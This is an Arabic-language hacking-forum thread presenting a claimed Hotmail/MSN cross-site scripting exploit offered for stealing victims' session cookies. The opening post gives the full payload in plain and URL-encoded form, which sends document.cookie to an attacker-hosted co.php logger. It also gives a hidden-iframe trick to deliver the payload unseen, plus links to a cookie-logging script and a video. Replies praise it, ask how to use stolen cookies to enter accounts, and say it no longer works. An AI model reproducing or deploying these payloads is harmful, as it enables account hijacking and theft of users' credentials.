[0dAy] msn XSS Vuln. Exploitation to cookies logging

السلام عليكم شرح ثغرة فى هوتميل من نوع
xss
حتى الحصول على الكوكيز الخاص بالضحية
الثغرة من اكتشاف الحربى
الاستغلال والشرح بواسطة فارس
كل ما ستحتاجه هو السكربت الخاص بتخزين الكوكيز
[b]http://pastebin.com/mZCMRcGC[/b]

ملحوظه (السكربتات الاخرى لن تقوم بتخزين الكوكيز كاملا)
شرح فيديو به باقى العملية
[b]http://www.mirrorcreator.com/files/1QHMGZI8/hotmail_xss_exploit.rar_links[/b]
نص الشرح لمن عندهم خلفية عن ثغرات ال
xss

| HaCKeR-MaN | sec4ever.com , alm3refh.com , 7rs.cc | personal Blog : 1337r1z.wordpress.com السلام عليكم نبدأ الشرح على السخان الاول نظبط صفحة اللوجات ع اى شل معاك حطها بس لازم تخلى اسم الملف co.php لو هتخليه اسم تانى غيره هنا عشان الكوكيز يوصل مرتب مش أكتر الاستغلال تبع الثغره http://glo.msn.com/search?searchTerm=“><object data=“javascript:document.location=‘http://www.viagra-pharma.com/co.php?c=’.concat(escape(document.cookie));”></script> غير http://www.viagra-pharma.com/co.php باللينك تبع الملف بتاعك انت باقى نعمل تمويه صغير بقى <iframe id=“rf” src=”" allowtransparency=“true” style=“display:none;” scrolling=“auto” frameborder=“0”> حط الكود ده فى اى اندكس تبعك قبل وسم ال </html> عشان تخدع الضحيه بس بعد كده نشفر الاستغلال من اول لاحظ من بعد = مباشرة فى برنامج coder http full نعدل الاستغلال بحيث يكون كده http://glo.msn.com/search?searchTerm=“><object%20data%3D"javascript%3Adocument.location%3D’http%3A%2F%2Fwww.viagra-pharma.com%2Fco.php%3Fc%3D’.concat(escape(document.cookie))%3B”><%2Fscript> نحطه بقى فى الاى فريم فى src= ونحفظ الصفحه نشوف الناتج

Greets to Karar , H311 C0D3 , Lagripe-Dz , Red virus , T3rrorist , the injector , Orange-Man , Fox-hacker , sec-mind , zaid , sa^Devil , Xss-Man , Raymon , Maestro-dz , sharp-hack and all [Eg,Ps,Dz,Ma,Sy] HaCKeRs
faris/.

اذا ممكن اداة الcoder
و اذا ممكن شرح كيفية استغلال الcookies للدخول للحساب

اديلووو يابو فارس يأروش xD

بارك الله فيك

ياا بططل

عجبتني كلمة رويش انت فعلا ريوش يافارس

أستااااااااذ انت فنان بارع << وديع هههه
بجدا جميل يا فارس … بصح لو عملت كل شيء في ملف واحد يصبح حلو لو :stuck_out_tongue:

[b]ادوس على التحميل وحمل وشوف الدرس ودوس مره تانيه لأعلق

انتظر رجوعي

[/b]

جار مشاهد ^_&

يعطيك العافية يا حجي

صراحة الثـغرة تمـام ممـتازة

ان شاء الله من تقدم لتقدم

بالتوفيـق

[b]ماقصرت اخوي فارس شرح جيد وواضح

وفيه طرق جميله جداً لاخواننا [/b]sa^Devil or [b][b]Orange-Man

وموفقين شباب …
[/b][/b]

مااا مشيت معي الطريقة:s

بالنسبة للأداه ممكن تحملها من هنا
http://www.bindshell.net/tools.html
مشكورين على المرور يا شباب

كااان مش شغال
برأيك لانو في دوال ممنوع او مشان الحماية
و ما خص؟

اذا ممكن تتأكد اذا بعدها الثغرة موجودة او لا

اخي بدي أسأل الثغره بعدها موجوده او لا

شكرااا

يعطيك العافيه يا حج فارس

على ما أظن الثغره سكرت من زماااان … اذا ممكن الااجابه من اصحاب الخبره ??

بارك الله فيك حبيبي
الف شكر تسلم اخي على
الموضوع